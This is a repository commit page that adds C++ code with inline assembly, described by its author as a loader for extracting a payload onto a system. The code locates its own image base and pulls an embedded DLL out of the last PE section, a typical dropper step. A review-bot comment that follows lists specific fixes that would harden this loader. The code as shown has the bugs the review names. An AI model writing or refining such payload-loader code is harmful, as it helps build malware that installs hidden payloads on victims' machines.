Changed a lot of things. Added a loader for extracting payload onto system

hellisabove
2023-07-03 15:32:13 +03:00
parent 0969e96a55
commit 9f4a57720b
69 changed files with 406 additions and 63 deletions
+36
@@ -0,0 +1,36 @@
#include "tools.h"
#include <Windows.h>
PVOID Tools::GetImageBase() {
PWORD virtual_address = PWORD(&GetImageBase);
PDWORD image_base = NULL;
__asm {
mov eax, virtual_address
and eax, 0xFFFF0000
IterateImage:
cmp WORD PTR[eax], 0x5A4D
je EndIteration
sub eax, 0x00010000
jmp IterateImage
EndIteration:
mov[image_base], eax
}
return image_base;
}
PBYTE Tools::ExtractDllFile(PBYTE module_base, PDWORD module_size) {
PIMAGE_DOS_HEADER image_dos_header = (PIMAGE_DOS_HEADER)(module_base);
if (image_dos_header->e_magic == IMAGE_DOS_SIGNATURE) {
PIMAGE_NT_HEADERS image_nt_headers = (PIMAGE_NT_HEADERS)(module_base + image_dos_header->e_lfanew);
if (image_nt_headers->Signature == IMAGE_NT_SIGNATURE) {
PIMAGE_SECTION_HEADER first_section = (PIMAGE_SECTION_HEADER)(IMAGE_FIRST_SECTION(image_nt_headers));
PIMAGE_SECTION_HEADER dll_section = (PIMAGE_SECTION_HEADER)(first_section + image_nt_headers->FileHeader.NumberOfSections - 1);
if (dll_section != ERROR) {
*module_size = dll_section->Misc.VirtualSize;
return RtlOffsetToPointer(module_base, dll_section->VirtualAddress);
}
}
}
}
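Review bot: `Tools::ExtractDllFile` has no return statement on its failure paths, so when the DOS or NT signature does not match the function falls off the end of a non-void function, which is undefined behaviour, and `*module_size` is never written; add `return NULL;` before the final closing brace. The guard `if (dll_section != ERROR)` is not a real check: `ERROR` is the wingdi.h region constant (0), and a pointer produced by `first_section + NumberOfSections - 1` is never null, so a zero section count would index one header before the table; replace it with `if (image_nt_headers->FileHeader.NumberOfSections == 0) return NULL;`. `e_lfanew`, `VirtualAddress` and `VirtualSize` are also used without being compared against the mapped image size, so a malformed header yields an out-of-range pointer and length for the caller. In `Tools::GetImageBase` the inline-asm loop steps down 64 KiB at a time until it reads `0x5A4D` with no lower bound, so it can fault on an unmapped page or stop on a different module's header, and MSVC `__asm` blocks only build for 32-bit x86. Both functions would benefit from a short comment stating what they return on failure and that the last section is assumed to hold the embedded image.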